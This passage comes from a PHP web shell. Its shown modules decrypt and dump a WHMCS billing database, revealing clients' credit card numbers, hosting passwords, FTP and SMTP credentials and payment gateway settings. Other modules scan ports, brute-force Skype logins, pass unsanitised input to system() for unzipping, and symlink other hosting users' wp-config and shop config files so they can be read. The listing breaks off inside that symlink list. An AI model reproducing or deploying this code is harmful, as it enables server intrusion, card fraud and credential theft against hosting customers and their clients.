  4491. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4492. <tr><th colspan='3'><nobr><span class='b7'>O=:[ DOMAIN REGISTRAR ]:=O</span></nobr></th></tr>
  4493. <tr>
  4494. <th align='center'><b>REGISTRAR</b></th>
  4495. <th align='center'><b>SETTING</b></th>
  4496. <th align='center'><b>VALUE</b></th></tr>";
  4497. if(!is_array(mysql_fetch_array($query))){
  4498. echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
  4499. }
  4500. while($v = mysql_fetch_array($query)){
  4501. $value = (!dec($v['value'],$cc_encryption_hash)) ? "0":dec($v['value'],$cc_encryption_hash);
  4502. echo "<tr>
  4503. <td align='center'>{$v['registrar']}</td>
  4504. <td align='center'>{$v['setting']}</td>
  4505. <td align='center'>$value</td></tr>" ;
  4506. }
  4507. echo "</table>";
  4508.  
  4509. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  4510. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4511. <tr><th colspan='4'> <span class='b7'>O=:[ FTP BACKUP ]:=O</span> </th></tr>
  4512.  
  4513. <tr>
  4514. <th align='center'><b>FTP HOSTNAME</b></th>
  4515. <th align='center'><b>FTP USERNAME</b></th>
  4516. <th align='center'><b>FTP PASSWORD</b></th>
  4517. <th align='center'><b>DESTINATION</b></th></tr>";
  4518. $ftpb = array('FTPBackupHostname',
  4519. 'FTPBackupUsername',
  4520. 'FTPBackupPassword',
  4521. 'FTPBackupDestination');
  4522. if(!is_array(mysql_fetch_array($query))){
  4523. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  4524. }
  4525. while($row = mysql_fetch_array($query)){
  4526. if($row[setting] == $ftpb[0]){
  4527. echo "<tr><td>{$row[value]}</td>";
  4528. $ftpb[0] = xxx;
  4529. }
  4530. elseif($row[setting] == $ftpb[1]){
  4531. echo "<td>{$row[value]}</td>";
  4532. $ftpb[1] = xxx;
  4533. }
  4534. elseif($row[setting] == $ftpb[2]){
  4535. echo "<td>{$row[value]}</td>";
  4536. $ftpb[2] = xxx;
  4537. }
  4538. elseif($row[setting] == $ftpb[3]){
  4539. echo "<td>{$row[value]}</td>";
  4540. $ftpb[3] = xxx;
  4541. }
  4542. }
  4543. echo "</table>";
  4544.  
  4545. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  4546. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4547. <tr><th colspan='4'><span class='b7'>O=:[ SMTP SERVER ]:=O</span> </th></tr>
  4548. <tr>
  4549. <th align='center'><b>SMTP HOST</b></th>
  4550. <th align='center'><b>SMTP USER</b></th>
  4551. <th align='center'><b>SMTP PASS</b></th>
  4552. <th align='center'><b>SMTP PORT</b></th></tr>";
  4553.  
  4554. $smtp = array('SMTPHost',
  4555. 'SMTPUsername',
  4556. 'SMTPPassword',
  4557. 'SMTPPort');
  4558. if(!is_array(mysql_fetch_array($query))){
  4559. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  4560. }
  4561. while($row = mysql_fetch_array($query)){
  4562. if($row[setting] == $smtp[0]){
  4563. echo "<tr><td>{$row[value]}</td>";
  4564. $smtp[0] = xxx;
  4565. }
  4566. elseif($row[setting] == $smtp[1]){
  4567. echo "<td>{$row[value]}</td>";
  4568. $smtp[1] = xxx;
  4569. }
  4570. elseif($row[setting] == $smtp[2]){
  4571. echo "<td>{$row[value]}</td>";
  4572. $smtp[2] = xxx;
  4573. }
  4574. elseif($row[setting] == $smtp[3]){
  4575. echo "<td>{$row[value]}</td>";
  4576. $smtp[3] = xxx;
  4577. }
  4578. }
  4579. echo "</table>";
  4580.  
  4581.  
  4582. $query = mysql_query("SELECT *FROM tblpaymentgateways");
  4583. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4584. <tr><th colspan='4'><nobr><span class='b7'>O=:[ PAYMENTS GATEWAY ]:=O</span></nobr></th></tr>
  4585.  
  4586. <tr>
  4587. <th align='center'><b>GATEWAY</b></th>
  4588. <th align='center'><b>SETTING</b></th>
  4589. <th align='center'><b>VALUE</b></th>
  4590. <th align='center'><b>ORDER</b></th></tr>";
  4591. if(!is_array(mysql_fetch_array($query))){
  4592. echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
  4593. }
  4594. while($v = mysql_fetch_array($query)){
  4595. echo "<tr>
  4596. <td align='center'>{$v['gateway']}</td>
  4597. <td align='center'>{$v['setting']}</td>
  4598. <td align='center'>{$v['value']}</td>
  4599. <td align='center'>{$v['order']}</td> </tr>" ;
  4600. }
  4601. echo "</table>";
  4602.  
  4603. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  4604. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  4605. <tr><th colspan='10'><nobr><span class='b7'>O=:[ CLIENTS CREDIT CARD ]:=O</span></nobr></th></tr>
  4606. <tr>
  4607. <th align='center'><b>CardType</b></th>
  4608. <th align='center'><b>CardNumb</b></th>
  4609. <th align='center'><b>Expdate</b></th>
  4610. <th align='center'><b>IssueNumber</b></th>
  4611. <th align='center'><b>FirstName</b></th>
  4612. <th align='center'><b>LastName</b></th>
  4613. <th align='center'><b>Address</b></th>
  4614. <th align='center'><b>Country</b></th>
  4615. <th align='center'><b>Phone</b></th>
  4616. <th align='center'><b>Email</b></th>
  4617. </tr>";
  4618. if(!is_array(mysql_fetch_array($query))){
  4619. echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
  4620. }
  4621. while($v = mysql_fetch_array($query)) {
  4622. $cchash = md5($cc_encryption_hash.$v['0']);
  4623. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
  4624. $v2=mysql_fetch_array($s);
  4625.  
  4626. echo "<tr>
  4627. <td align='center'>".$v2['cardtype']."</td>
  4628. <td align='center'>".$v2['cardnum']."</td>
  4629. <td align='center'>".$v2['expdate']."</td>
  4630. <td align='center'>".$v2['issuenumber']."</td>
  4631. <td align='center'>".$v2['firstname']."</td>
  4632. <td align='center'>".$v2['lastname']."</td>
  4633. <td align='center'>".$v2['address1']."</td>
  4634. <td align='center'>".$v2['country']."</td>
  4635. <td align='center'>".$v2['phonenumber']."</td>
  4636. <td align='center'>".$v2['email']."</td></tr>";
  4637. }
  4638. echo "</table>";
  4639.  
  4640. $query = mysql_query("SELECT *FROM tblhosting");
  4641. echo "<br/><br/><center>
  4642. <table class='explore' style=width:830px;padding:0 1px;>
  4643. <tr><th colspan='6'><nobr><span class='b7'>O=:[ CLIENTS HOSTING ACCOUNT ]:=O</span></nobr></th></tr>
  4644. <tr>
  4645. <th align='center'><b>DOMAIN</b></th>
  4646. <th align='center'><b>STATUS</b></th>
  4647. <th align='center'><b>USERNAME</b></th>
  4648. <th align='center'><b>PASSWORD</b></th>
  4649. <th align='center'><b>DEDICATED IP</b></th>
  4650. <th align='center'><b>ASSIGNED IP</b></th></tr>";
  4651. if(!is_array(mysql_fetch_array($query))){
  4652. echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  4653. }
  4654. while($v = mysql_fetch_array($query)){
  4655. echo "<tr>
  4656. <td align='center'>{$v['domain']}</td>
  4657. <td align='center'>{$v['domainstatus']}</td>
  4658. <td align='center'>{$v['username']}</td>
  4659. <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
  4660. <td align='center'>{$v['dedicatedip']}</td>
  4661. <td align='center'>{$v['assignedips']}</td></tr>";
  4662. }
  4663. echo "</table>";
  4664. }
  4665. }
  4666.  
  4667.  
  4668. # x=psan
  4669. elseif(isset($_GET['x']) && ($_GET['x'] == 'pscan')){ ?>
  4670. <form action="?dm=<?php echo $pwd; ?>&amp;x=pscan" method="post">
  4671.  
  4672. <?php
  4673. echo '<center><br/><br/><nobr><b><span class="b7">O=:[ PORT</span> <span class="b8">SCANNER ]:=O</span></b></nobr><br/><br/>';
  4674.  
  4675. $start = strip_tags($_POST['start']);
  4676. $end = strip_tags($_POST['end']);
  4677. $host = strip_tags($_POST['host']);
  4678.  
  4679. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  4680.  
  4681. for($i = $start; $i<=$end; $i++){
  4682. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  4683. if($fp){
  4684.  
  4685. echo "Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font><br>";
  4686. }
  4687. flush();
  4688. }
  4689. } else {
  4690. echo '<input type="hidden" name="y" value="phptools">
  4691.  
  4692. Host <br/>
  4693. <input type="text" class="inputz" name="host" value="localhost"/><br />
  4694. Port Start<br />
  4695. <input type="text" class="inputz" name="start" value="0"/><br />
  4696. Port End:<br />
  4697. <input type="text" class="inputz" name="end" value="5000"/><br />
  4698. <input type="submit" class="inputzbut" value="Scan Ports" />
  4699. </form></center>';
  4700. }
  4701. }
  4702.  
  4703. // ********** x=string ********** //
  4704. elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){ ?>
  4705. <form action="?dm=<?php echo $pwd; ?>&amp;x=string" method="post">
  4706.  
  4707. <br><br><form method='post'>
  4708. <table class="tabnet"><tbody>
  4709. <tr><th colspan="2"> String to Hash </th></tr>
  4710. <tr><td>String : </td>
  4711. <td><input type='text' class='inputz' name='hash_input' value='<? if(isset($_POST['hash_input'])){echo $_POST['hash_input'];}?>' /></td></tr>
  4712. <tr>
  4713. <td align="center" colspan="2"><input type='submit' name='submit_hash' style="width:100%;" class='inputzbut' value='Encode' /></td>
  4714. </tr>
  4715. </tbody>
  4716. </table>
  4717. </form>
  4718. <br><br>
  4719.  
  4720. <?php
  4721. if(isset($_POST['submit_hash'])) {
  4722. if(isset($_POST['hash_input'])) {
  4723. $hash_input = $_POST['hash_input'];
  4724. }
  4725.  
  4726. if($hash_input=="") {
  4727. echo 'Nothing Inserted!';
  4728. } else {
  4729. if (isset($hash_input)) {
  4730. echo "<table class='tabnet'><tbody>
  4731. <tr><th colspan='2'> Hash </th></tr>";
  4732.  
  4733. foreach (hash_algos() as $hash_setoption) { $calculate_hash = hash($hash_setoption, $hash_input, false);
  4734.  
  4735. echo "<tr><td width='70' align='center'><font style='color:#9F7CEB'>$hash_setoption</font></td><td><font style='color:#5BC740'>$calculate_hash</font></td></tr>";
  4736. }
  4737. echo "</tbody></table>";
  4738. }
  4739. }
  4740. }
  4741. }
  4742.  
  4743. # x=cc
  4744. elseif(isset($_GET['x']) && ($_GET['x'] == 'cc')){ ?>
  4745. <form action="?dm=<?php echo $pwd; ?>&amp;x=cc" method="post">
  4746.  
  4747. <?php
  4748. class CreditCardValidator {
  4749. private $arrCardInfo = array('status' => null, 'type' => null, 'substring' => null, 'reason' => null);
  4750.  
  4751. private $arrCardTypes = array('amex' => array('name' => 'American Express','active' => true, 'iinrange' => '34,37','length' => 15), 'discover' => array('name' => 'Discover','active' => true,'iinrange' => '6011,622126-622925,644-649,65','length' => 16), 'mastercard' => array('name' => 'MasterCard','active' => true,'iinrange' => '51-55','length' => 16), 'visa' => array('name' => 'VISA','active' => true,'iinrange' => '4','length' => 16));
  4752.  
  4753. private $arrAcceptedMII = array(3, 4, 5, 6);
  4754. public function Validate($strCardNumber=null, $strCardType=null) {
  4755.  
  4756. if($strCardNumber === null) {
  4757. $this->arrCardInfo['failure'] = 'format';
  4758. $this->arrCardInfo['status'] = 'invalid';
  4759. return false;
  4760. }
  4761.  
  4762. if(($strCardType !== null) && !in_array($strCardType, $this->arrCardTypes)) {
  4763. $this->arrCardInfo['failure'] = 'cardtype';
  4764. $this->arrCardInfo['status'] = 'invalid';
  4765. return false;
  4766. }
  4767. if(!$this->CheckMII($strCardNumber)) {
  4768. $this->arrCardInfo['failure'] = 'mii';
  4769. $this->arrCardInfo['status'] = 'invalid';
  4770. return false;
  4771. }
  4772. if(!$this->CheckIIN($strCardNumber)) {
  4773. $this->arrCardInfo['failure'] = 'iin';
  4774. $this->arrCardInfo['status'] = 'invalid';
  4775. return false;
  4776. }
  4777. if(!$this->CheckLuhn($strCardNumber)) {
  4778. $this->arrCardInfo['failure'] = 'algorithm';
  4779. $this->arrCardInfo['status'] = 'invalid';
  4780. return false;
  4781. }
  4782. $this->arrCardInfo['status'] = 'valid';
  4783. $this->arrCardInfo['substring'] = $this->GetCardSubstring($strCardNumber);
  4784. return true;
  4785. }
  4786. private function CleanCardNumber($strCardNumber=null) {
  4787. return preg_replace('/[^0-9]/', '', $strCardNumber);
  4788. }
  4789.  
  4790. private function GetCardSubstring($strCardNumber=null) {
  4791. if(strstr($strCardNumber, '*') && (substr($strCardNumber) < 10)) return $strCardNumber;
  4792. $strCardNumber = $this->CleanCardNumber($strCardNumber);
  4793. return $strCardNumber ? '***'.substr($strCardNumber, (strlen($strCardNumber) - 4), 4) : '';
  4794. }
  4795.  
  4796. private function CheckMII($strCardNumber=null) {
  4797. $strCardNumber = $this->CleanCardNumber($strCardNumber);
  4798. if(!$strCardNumber) return false;
  4799.  
  4800. $intFirstDigit = (int) substr($strCardNumber, 0, 1);
  4801. if(!in_array($intFirstDigit, $this->arrAcceptedMII)) return false;
  4802. return true;
  4803. }
  4804.  
  4805. private function CheckLuhn($strCardNumber=null) {
  4806. $strCardNumber = (string) $this->CleanCardNumber($strCardNumber);
  4807. $strCheckDigit = substr($strCardNumber, (strlen($strCardNumber) - 1), 1);
  4808. $strCardNumberReverse = strrev($strCardNumber);
  4809. $intTotal = 0;
  4810. for($i = 1; $i <= strlen($strCardNumberReverse); $i++) {
  4811. $intVal = (int) ($i % 2) ? $strCardNumberReverse[$i-1] : ($strCardNumberReverse[$i-1] * 2);
  4812. if($intVal > 9) {
  4813. $strVal = (string) $intVal;
  4814. $intVal = (int) ($strVal[0] + $strVal[1]);
  4815. }
  4816. $intTotal += $intVal;
  4817. }
  4818. return (($intTotal % 10) == 0) ? true : false;
  4819. }
  4820.  
  4821. private function CheckIIN($strCardNumber=null) {
  4822. $strCardNumber = $this->CleanCardNumber($strCardNumber);
  4823. if(!$strCardNumber) return false;
  4824. $arrCardTypePossibilities = array();
  4825. foreach($this->arrCardTypes as $strShortName => $arrCardType) {
  4826. if($arrCardType['active'] === true) {
  4827. $strLen = strlen($strCardNumber);
  4828. if($strLen == $arrCardType['length']) {
  4829.  
  4830. $arrRangeSets = explode(',', $arrCardType['iinrange']);
  4831. foreach($arrRangeSets as $strRangeSetItem) {
  4832. $arrStrRanges = explode('-', $strRangeSetItem);
  4833. if(count($arrStrRanges) > 1) {
  4834. for($i = $arrStrRanges[0]; $i <= $arrStrRanges[1]; $i++) {
  4835.  
  4836. if((strpos((string) $strCardNumber, (string) $i) === 0) && !in_array($strShortName, $arrCardTypePossibilities)) $arrCardTypePossibilities[] = $strShortName;
  4837. }
  4838. } else {
  4839. if((strpos((string) $strCardNumber, (string) trim($arrStrRanges[0])) === 0) && !in_array($strShortName, $arrCardTypePossibilities)) $arrCardTypePossibilities[] = $strShortName;
  4840. }
  4841. }
  4842. }
  4843. }
  4844. }
  4845. $this->arrCardInfo['type'] = implode('|', $arrCardTypePossibilities);
  4846. return count($arrCardTypePossibilities) ? true : false;
  4847. }
  4848.  
  4849. public function GetCardInfo() {
  4850. return $this->arrCardInfo;
  4851. }
  4852.  
  4853. public function GetCardName($strCardShortName=null) {
  4854. return isset($this->arrCardTypes[$strCardShortName]['name']) ? $this->arrCardTypes[$strCardShortName]['name'] : '';
  4855. }
  4856. }
  4857. $CCV = new CreditCardValidator();
  4858.  
  4859. if(isset($_POST['cardnum'])) :
  4860. $CCV->Validate($_POST['cardnum']);
  4861. $CARDINFO = $CCV->GetCardInfo();
  4862. endif;
  4863. ?>
  4864.  
  4865. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
  4866. <html lang="en"><head>
  4867. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  4868. <title>Credit Card Validation - Test Page</title><style type="text/css">
  4869. body{ font-size: 13px; color: #333; font-family: 'georgia', 'times new roman', serif; margin: 20px; }
  4870.  
  4871. fieldset{ border: 0; margin: 0; font-style: italic; }
  4872.  
  4873. legend{ display: none; }
  4874.  
  4875. label{ width: 100%; float: left; clear: both; font-size: 15px; font-weight: bold; color: #999; line-height: 3; }
  4876.  
  4877. input, textarea{ font-size: 18px; line-height: 1.4; padding: 10px; border: 2px solid #eee; }
  4878.  
  4879. textarea{ background-color: #eee; color: blue; }
  4880.  
  4881. h2{ font-size: 30px; }
  4882.  
  4883. #fs-input input{ width: 500px; margin-bottom: 15px; }
  4884. #fs-input input.cb{ width: auto; }
  4885. #fs-submit input{ background-color: #333; color: lightyellow; }
  4886. </style>
  4887. </head>
  4888.  
  4889. <body><h2>Credit Card Tester</h2>
  4890. <form action="" method="post">
  4891. <fieldset id="fs-input"><legend></legend>
  4892. <label>Card Number</label>
  4893. <input type="text" style="color:#FF0000;background-color:#000000" name="cardnum" value="<?php echo @$_POST['cardnum']; ?>"><br>
  4894. <input type="checkbox" name="showgeek" class="cb" value="1"<?php if(isset($_POST['showgeek'])) echo ' checked'; ?>> Show Geeky Output
  4895. </fieldset>
  4896. <fieldset id="fs-submit">
  4897. <legend></legend>
  4898. <label></label>
  4899. <input type="submit" value="Check CC">
  4900. </fieldset>
  4901. <?php if(isset($_POST['cardnum'])) : ?>
  4902. <hr>
  4903.  
  4904. <h2>Result</h2><fieldset id="fs-result">
  4905. <legend></legend><label></label>
  4906. <strong>Status:</strong> <?php echo strtoupper($CARDINFO['status']); ?><br>
  4907. <strong>Card Type: </strong> <?php echo $CCV->GetCardName($CARDINFO['type']); ?>
  4908. </fieldset>
  4909. <?php endif; ?>
  4910. <?php if(isset($_POST['showgeek'])) : ?>
  4911. <fieldset id="fs-geek-result">
  4912. <legend></legend>
  4913. <label>Geeky Result</label>
  4914. <textarea style="color:#FF0000;background-color:#000000" rows="40" cols="80"><?php print_r($CCV); ?></textarea>
  4915. </fieldset>
  4916. <?php endif; ?>
  4917. </form></body></html>
  4918.  
  4919. <?php }
  4920. # x=unzip
  4921. elseif(isset($_GET['x']) && ($_GET['x'] == 'unzip')){
  4922. ?>
  4923. <form action="?dm=<?php echo $pwd; ?>&amp;x=unzip" method="post">
  4924. <center><br/><br/><nobr><span class="b7">O=:[ ZIP FILE</span> <span class="b8">EXTRACTOR ]:=O</nobr><br/><br/>
  4925. <?php
  4926. $file = $_POST['file'];
  4927. if (isset($file)){
  4928. echo "<nobr><b>[+] PROSES BONGKAR [+]</b><br><br></nobr>";
  4929. system('unzip -o ' . $file);
  4930. echo "<br/>";
  4931. exit;
  4932. }
  4933.  
  4934. $handler = opendir(".");
  4935. echo "<center><b>Pilih File Yg Mau Di Unzip :<b><br> " . "<br>";
  4936. echo '<form action="" method="get">';
  4937. $found = false;
  4938. while ($file = readdir($handler)) {
  4939. if (preg_match ("/.zip$/i", $file)) {
  4940. echo '<input type="radio" name="file" value=' . $file . '> ' . $file . '<br>';
  4941. $found = true;
  4942. }
  4943. }
  4944. closedir($handler);
  4945. if ($found == false)
  4946. echo "<br><br><b>[+] GA ADA FILE EXTENSI ZIP [+]<b><br>";
  4947. else
  4948. echo '<br><br><inpuy type="submit" value="Unzip File">';
  4949. echo "</form>";
  4950. ?>
  4951.  
  4952. <?php }
  4953. # x=analyzer
  4954. elseif(isset($_GET['x']) && ($_GET['x'] == 'analyzer')){
  4955. ?>
  4956. <form action="?dm=<?php echo $pwd; ?>&amp;x=analyzer" method="post">
  4957.  
  4958. <center><br/><br/><nobr><span class="b7">O=:[ HASH TYPE</span> <span class="b8">ANALYZER ]:=O</nobr><br/><br/> <form method=POST>
  4959. <input type="text" style="color:#FF0000;background-color:#000000" name="hashToAnalyze" size=60><input type="submit" style="color:#FF0000;background-color:#000000" value="Check Hash Now" name="analyzieNow"></form></center>
  4960. <?php
  4961. if($_POST['analyzieNow']){
  4962. $hash = $_POST['hashToAnalyze'];
  4963. $subHash = substr($hash,0,3);
  4964. if($subHash =='$ap' && strlen($hash) == 37){
  4965. echo "The Hash : ".$hash." is : MD5(APR) Hash";
  4966. }
  4967. else if($subHash =='$1$' && strlen($hash) == 34){
  4968. echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
  4969. }
  4970. else if($subHash =='$H$' && strlen($hash) == 35){
  4971. echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
  4972. }
  4973. else if(strlen($hash) == 29){
  4974. echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
  4975. }
  4976. else if($subHash =='$5$' && strlen($hash) == 64){
  4977. echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
  4978. }
  4979. else if($subHash =='$6$' && strlen($hash) == 128){
  4980. echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
  4981. }
  4982. else if(strlen($hash) == 56){
  4983. echo "The Hash : ".$hash." is : SHA224 Hash";
  4984. }
  4985. else if(strlen($hash) == 64){
  4986. echo "The Hash : ".$hash." is : SHA256 Hash";
  4987. }
  4988. else if(strlen($hash) == 96){
  4989. echo "The Hash : ".$hash." is : SHA384 Hash";
  4990. }
  4991. else if(strlen($hash) == 128){
  4992. echo "The Hash : ".$hash." is : SHA512 Hash";
  4993. }
  4994. else if(strlen($hash) == 40){
  4995. echo "The Hash : ".$hash." is : MySQL v5.x Hash";
  4996. }
  4997. else if(strlen($hash) == 16){
  4998. echo "The Hash : ".$hash." is : MySQL Hash";
  4999. }
  5000. else if(strlen($hash) == 13){
  5001. echo "The Hash : ".$hash." is : DES(Unix) Hash";
  5002. }
  5003. else if(strlen($hash) == 32){
  5004. echo "The Hash : ".$hash." is : MD5 Hash";
  5005. }
  5006. else if(strlen($hash) == 4){
  5007. echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
  5008. else {
  5009. echo "Error : Can't Detect Hash Type";
  5010. }
  5011. }
  5012. ?>
  5013.  
  5014.  
  5015. <?php }
  5016. # x=skype
  5017. elseif(isset($_GET['x']) && ($_GET['x'] == 'skype')){
  5018. ?>
  5019. <form action="?dm=<?php echo $pwd; ?>&amp;x=skype" method="post">
  5020. <br/><br/><form method='POST'>
  5021.  
  5022. <center><br/><br/>
  5023. <img src='http://www.in-travel.info/easter2013/wp-content/uploads/2012/12/Skype-Logo-300x133.png'><br/><br/><nobr><span class='b7'>O=:[ BRUTEFORCE</span> <span class='b8'>SKYPE ACCOUNT ]:=O</span></nobr><br/><br/>
  5024. <nobr>Username : <input style='color:#FF0000;background-color:#000000' type='text' name='skypename' placeholder='Skype Name' size='38'><br>
  5025. <textarea style='color:#FF0000;background-color:#000000' rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br><br>
  5026. <input style='color:#FF0000;background-color:#000000' type='submit' value='Start BruteForce' name='brute'><br>
  5027. </center>
  5028. </form>
  5029. <?php
  5030. @set_time_limit(0);
  5031. $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin";
  5032. # Username & Password
  5033. $username = $_POST['skypename'];
  5034. $password = explode("\r\n", $_POST['passwords']);
  5035.  
  5036. $time = date_default_timezone_set("Asia/Jakarta");
  5037. $date = date('H:i:s');
  5038. $header = "HTTP/1.1 302";
  5039. function xsecurity($skype){
  5040. $ch = curl_init();
  5041. curl_setopt($ch, CURLOPT_URL, $skype);
  5042. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  5043. curl_setopt($ch, CURLOPT_HEADER, 1);
  5044. curl_setopt($ch, CURLOPT_POST, 1);
  5045. curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  5046. curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  5047. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  5048. $run = curl_exec($ch);
  5049. preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash);
  5050. preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie);
  5051. preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm);
  5052. return $hash[1]."|:|".$piie[1]."|:|".$etmm[1];}
  5053.  
  5054. $xsec = explode("|:|" ,xsecurity($skype));
  5055. $token = $xsec[0];
  5056. $pie = $xsec[1];
  5057. $etm = $xsec[2];
  5058.  
  5059. function brute($skype,$username,$pass,$header){
  5060. $ch = curl_init();
  5061. curl_setopt($ch, CURLOPT_URL, $skype);
  5062. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  5063. curl_setopt($ch, CURLOPT_HEADER, 1);
  5064. curl_setopt($ch, CURLOPT_POST, 1);
  5065. curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin");
  5066. curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  5067. curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  5068. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  5069. $brute = curl_exec($ch);
  5070. if(strstr($brute, $header)){
  5071. echo "<br><br><nobr><center><span class='b11'>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></span></center>";
  5072. }
  5073. return $brute;
  5074. }
  5075. if($_POST['brute']){
  5076. foreach($password as $pass)
  5077. {
  5078. brute($skype,$username,$pass,$header);
  5079. }
  5080. }
  5081. ?>
  5082.  
  5083. <?php }
  5084. # x=grabber
  5085. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabber')){
  5086. ?>
  5087. <form action="?dm=<?php echo $pwd; ?>&amp;x=grabber" method="post">
  5088.  
  5089. <center><br/><br/><nobr><span class="b7">O=:[ CONFIG</span> <span class="b8">GRABBER ]:=O</nobr><br/><br/><form method="POST">
  5090. <textarea style="color:#FF0000;background-color:#000000"cols="50" rows="20" name="passwd" ></textarea><br/><br/>
  5091. <input name="cat" size="80" style="color:#FF0000;background-color:#000000" value="START GRAB CONFIG" type="submit"><br/></form>
  5092.  
  5093. <?php
  5094. @error_reporting(0);
  5095. @set_time_limit(0);
  5096. if($_POST["cat"] && !$_POST["passwd"]==""){
  5097. echo "Checking Functions ...<br>";
  5098. $functions=@ini_get("disable_functions");
  5099. if(eregi("symlink",$functions)){
  5100. die("<center><br/><br/><nobr><span class='b9'>DISABLE FUNCTIONS IS ON</span></nobr><br/><br/></center>");
  5101. }
  5102. @mkdir("dm_grab", 0755);
  5103. @chdir("dm_grab");
  5104. $htaccess="
  5105. Options all
  5106. Options +Indexes
  5107. Options +FollowSymLinks
  5108. DirectoryIndex Sux.html
  5109. AddType text/plain .php
  5110. AddHandler server-parsed .php
  5111. AddType text/plain .html
  5112. AddHandler txt .html
  5113. Require None
  5114. Satisfy Any";
  5115. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  5116. $passwd=$_POST["passwd"];
  5117. $passwd=explode("\n",$passwd);
  5118. echo "Start Symlinking ...<br>";
  5119. foreach($passwd as $pwd){
  5120. $pawd=explode(":",$pwd);
  5121. $user =$pawd[0];
  5122. // Now symlink Them
  5123. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-shop.txt');
  5124. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-shop-os.txt');
  5125. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-oscom.txt');
  5126. @symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$user.'-oscommerce.txt');
  5127. @symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$user.'-oscommerces.txt');
  5128. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-shop2.txt');
  5129. @symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$user.'-shop-shopping.txt');
  5130. @symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$user.'-sale.txt');
  5131. @symlink('/home/'.$user.'/public_html/amember/config.inc.php',$user.'-amember.txt');
  5132. @symlink('/home/'.$user.'/public_html/config.inc.php',$user.'-amember2.txt');
  5133. @symlink('/home/'.$user.'/public_html/members/configuration.php',$user.'-members.txt');
  5134. @symlink('/home/'.$user.'/public_html/config.php',$user.'-4images1.txt');
  5135. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-forum.txt');
  5136. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-forums.txt');
  5137. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
  5138. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
  5139. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
  5140. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
  5141. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
  5142. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
  5143. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
  5144. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
  5145. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
  5146. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
